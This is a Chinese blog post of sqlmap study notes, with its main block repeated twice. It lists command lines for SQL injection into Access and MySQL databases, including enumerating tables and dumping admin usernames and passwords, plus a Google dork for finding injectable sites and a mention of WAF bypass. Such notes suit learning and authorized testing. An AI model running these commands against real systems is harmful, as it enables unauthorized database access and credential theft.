sqlmap 随笔 羽翼sqlmap学习笔记
2017-08-07 23:07
344 查看
sqlmap mysql 命令
http://www.jb51.net/softjc/63593.html
写文件 注意:当sqlmap结束运行后,所产生的文件会自动删除
分析其使用场景
cookie 注入
post 注入。
伪静态注入。 什么场景下使用?
命令执行 。
请求延时 场景:
google 搜索 : sqlmap -g inurl:php?id
绕过waf
一: Access数据库注入
sqlmap.py
-u "URL" --tables #跑表
sqlmap.py
-u "URL" --columns -T admin #对admin表里的字段猜解
sqlmap.py
-u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容
二:Mysql数据库注入
sqlmap.py
-u "URL" --dbs #猜解数据库
sqlmap.py
-u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库
sqlmap.py
-u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
sqlmap.py
-u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容
http://www.jb51.net/softjc/63593.html
写文件 注意:当sqlmap结束运行后,所产生的文件会自动删除
分析其使用场景
cookie 注入
post 注入。
伪静态注入。 什么场景下使用?
命令执行 。
请求延时 场景:
google 搜索 : sqlmap -g inurl:php?id
绕过waf
一: Access数据库注入
sqlmap.py
-u "URL" --tables #跑表
sqlmap.py
-u "URL" --columns -T admin #对admin表里的字段猜解
sqlmap.py
-u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容
二:Mysql数据库注入
sqlmap.py
-u "URL" --dbs #猜解数据库
sqlmap.py
-u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库
sqlmap.py
-u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
sqlmap.py
-u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 羽翼sqlmap课程学习笔记
- 4.羽翼sqlmap学习笔记之Post登录框注入
- 1.羽翼sqlmap学习笔记之Access注入
- 2.羽翼sqlmap学习笔记之MySQL注入
- 3.羽翼sqlmap学习笔记之Cookie注入
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-03-基于Python的LeNet之LR
- 【Android开发学习笔记】【高级】【随笔】插件化——初探
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-03-基于Python的LeNet之LR
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-01-CNN基础知识点
- [Java]学习笔记,随笔【十】
- jqGrid 学习笔记--数据异步加载方法 随笔1
- [Java]学习笔记,随笔【八】
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-04-基于Python的LeNet之MLP
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-02-基于Python的卷积运算
- 关于SQLMAP所有参数的学习笔记
- sqlmap 的源码学习笔记一之目录结构
- 深度学习(DL)与卷积神经网络(CNN)学习笔记随笔-02-基于Python的卷积运算
- sqlmap 的源码学习笔记二之编写tamper脚本
- [Java]学习笔记,随笔【二】
- 【Android开发学习笔记】【高级】【随笔】插件化——资源加载